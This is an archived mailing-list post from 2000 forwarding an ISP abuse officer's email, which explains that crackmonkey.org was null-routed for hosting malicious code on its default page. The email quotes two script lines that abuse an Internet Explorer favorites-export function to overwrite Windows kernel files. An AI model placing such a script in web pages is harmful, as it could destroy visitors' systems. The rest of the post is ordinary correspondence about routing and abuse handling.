[CrackMonkey] [larry@computerrific.net: Re: 204.94.189.42]

Nick Moffitt nick at zork.net
Sun Feb 27 23:09:29 PST 2000


----- from Larry Sherman <larry at computerrific.net> -----

Date: Sun, 27 Feb 2000 22:40:00 -0800 (PST)
From: Larry Sherman <larry at computerrific.net>
To: Nick Moffitt <nick at zork.net>
Subject: Re: 204.94.189.42
In-Reply-To: <20000227173912.A13258 at zork.net>

Nick,

I received a notice from Verio Abuse regarding your 'www.crackmonkey.org'
site. The complaint had to do with malicious code in your default page.

Here are the lines involved:

<script>
window.external.ImportExportFavoriates(0,"c:\\winnt\system32\\ntoskrnl.exe");
</script>
<script>
window.external.ImportExportFavoriates(0,"c:\\winnt\system32\\krnl386.exe");
</script>

Although these system files are "protected" from overwrite, a system
could be destroyed if the unsuspecting visitor had a dual boot setup. The
non-booted system would end up with bookmarks instead of a krnl file.

I had no choice but to have your site taken off the Net. I expected the
Verio Abuse department to contact you. It appears they didn't.

I _did_ hit your site many times, but I wasn't attacking it. I was
testing the null routing of 204.94.189.42. Curiously, my browser kept
accessing your site when it shouldn't have been able to.

You need to contact abuse at verio.net about the future of your routing.

Regards,

Larry

--
Larry Sherman
Director, Systems Operations
Verio Inc (Best Internet)


On Sun, 27 Feb 2000, at 5:39pm -0800, Nick Moffitt wrote:

> I must apologise for the tone of my previous e-mail.  I saw that a
> machine on your network had been repeatedly loading my site, and
> suspected foul play (Especially since there was a request for '/..', I
> assumed to exploit an old httpd flaw).
> 
> I called the NOC and they explained to me that you work for
> Best/Verio, and that you were in fact directly responsible for
> blocking my IP address in the verio routers.
> 
> A word that appeared in their notes was "abuse".  Now, I received no
> e-mail complaining about any abuse of Verio's services, and to my
> knowledge none of my users have been contacted either.  
> 
> I am still able to send and receive mail at zork.net, and would
> appreciate it if you could explain to me why exactly my machine is
> being forbidden from communicating with the Internet.
> 
> -- 
> CrackMonkey.Org - Non-sequitur arguments and ad-hominem personal attacks
> LinuxCabal.Org  - Co-location facilities and meeting space 
> 


----- End forwarded message -----

-- 
CrackMonkey.Org - Non-sequitur arguments and ad-hominem personal attacks
LinuxCabal.Org  - Co-location facilities and meeting space 




